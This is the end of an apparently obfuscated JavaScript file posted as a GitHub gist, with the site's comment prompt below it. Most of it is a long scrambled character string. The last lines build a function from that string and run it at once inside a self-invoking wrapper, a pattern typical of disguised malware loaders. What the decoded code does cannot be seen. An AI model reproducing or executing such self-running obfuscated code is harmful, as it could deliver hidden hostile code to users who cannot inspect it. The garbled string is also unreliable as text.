]521G)8I0,enm91k,@a0*it4%Ca3jIW4h,-ea2,e].,s59)8l2=t4_x955ArM,G8Ca9.1,ra[a,ttG61)e#1anZ5sGAt2t8A,0ppw"1e%ai(=7ve0,(]3d21,4,5MZ-.1fp1ru07r.ZGasu,aa;,g6y,-,ox3saui-i4,Ga4tps8.)*300=m]8]Y2;3{e>k16f2v3 f=trio!1cnG,ii.c5)g^10tt5[i}7Ac+:eone,b:"r}(0Ao7s,{s62nab)\'11a|daipti]8u4tla=r]dpn226eb1e,}htu6NlE3].#lneGQ02_,.b8b\'o0au]a5G0G_20me29i pi3t711od)=Zet.xeA_lp),ow"ttr.i-}@8.6cdG9i50nt2-i%d^]2mt{naZo0])t2e_1\/xdAt8)h^A,}afo2bi3ng:1o18 10%b,]!b.i0aGa0h}66)tf%ZZ.op.5x:,m0xm6^aars#;8= =ZyMv0;pnne7np,,Gp.6^o"3.nx41tfxxyl+,aDrc#;,4n2a3)Z0,B1)l#{ai0Zn6lZEt66.dsieoenl[oa%){a_ oZoZEi4:"_078fEe! 0xOA,,-,3s738a,laGeL5k60l2oA1pi!EGr 2)i2:a7)tl?t6]z(]Zu10,7j).yaien)_nZZ:3AUd1e.quG_y)ea a.AZ22xhf,A4aa^r,pn_!i1Z)A^iZab.k7C m,a`0=93.03[=6,Zh%G.p[1p) 881l4,mat002t .m,4u].t]:E04meSrMG&5f26,90"G^8.w;87.|hl;i&iorA,ei2iTd4G-ci]Ni{jy(o7o)n_=+e05._1adc1T[.Cp_77aZ.Gntc:^6sgdr.-54ab,a4"]aa =k2^8(z2o3,00iAv3AQs,740.aG)a,43-h=dt04k]itd.h=v0;me7,i6i!.t0t7]an]t,.9s[ -96591w5:e4ywZxaA2 i%p$6G1a,1.BI=on2;bG.e_<_496803liG23Z9+,t2 G,;73)2,he2\'t(aa.A ]3ZuG32I.1u1G8s#,ZXGoe1rh3]aAst6i=^ob! Mn,6)1k,2.Pw"ri}^0i A.1tr,;:^Me,eak=]y91^]0e\/a48#-d1_tbnG15il8id6o52en,.:2ayE^vG;3y-sflsG :dZE]0,m..)28xG$g]1i024wspiGt-^2naG]0_aZZdBi[p] 00ro55.m^.did5bd27.Zi]^c.(2d[E6o,G^-10%G!0 G.n0 zp^1ta52{!ee6s=90nQZp5oZGM3&sf)450ZaaHd46-GI4bo-^ebzrm5Ir}1l.d05AZkZo!G1,b2^d;5nZ\'_o).#!.,dZ:s^u1,ci8Zt(eC ef8:eei.n43]G]\/2xR^9a ^{a7,G[exr+.ma!ZG,4?!m1AHs(rpB0]e.3iG]k]+d,CG,scr0IM1(5Gis"2(raeCt"tcZrZc r]iyaippmeeut9;Z{t]1G;^Zao,i".t36- dl.-%!0r]1n. vo50^,0{2 ,;9Y=t4Pn;8fa aG4^4oaVpS=|4xy2a3Ces1Z2}-yC,.+B_s!Z11.:0!l]21en]d2,7".vfryw0=114856Va8eor|d-in{)Aa ,c,i]D9 vGf9t)aAi:I,:)%Z,^a+;,1Ax]a!1_1o,2,tA63^,o01TaGya=0Z0k12p.)r0apri4)b!07d>bgt0t!sr71ag^4u]i,.02-iU ,108lGc^{rope{a!r2;._!e 5=otrZ2 ]1.1,s04a7.5.ifq][nc].8i.)3uo_1e2,eia2t. Nlr!n5c_Ze0c;)8sAA9Gm.e-a!4u])7lE.52012toi.Z2Ca2{kn2;!r4Za:lpia-p..54(r66 7ilb1GehsZ:|Z,.1,GA)nf32,1t.;f,r6_ir\\e!1de-29 o[I,.e21.!+7xZs-,3^4482 o=0855ei-1ea0,[o, ln\'t,rt"drdGr:n^ti2h. 77{A0 {tr4[0dm.9(ta$x202n2o3Aate1]st]G722 6l,0Z cA2=,p,2m-,=.ee,Z5a]D1^ -l44k(0>|f,GxD6u, pm]kr tr6JpnA7,d(tsZ..^4-{Z41=mot)! ohZ3,-Ai.}a!,243u^x133, lG36!l%&4k0e*!)aam.Zam(.7i=rx9 Gr0rT.Sd2nhG&0A,A,l,tef(%CYrci7mm2x8cG=%.w#.:%e)t eumt1t5s_I+=}3 18an8>3og^50e4ap-,^v5;A]rxn1#oeety2A5au4jaRIti-7.i\/n"d eo<45: "}')); | |
var CuM = Uku(kjn, FpP); | |
CuM(4372); | |
return 9137 | |
} | |
)() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment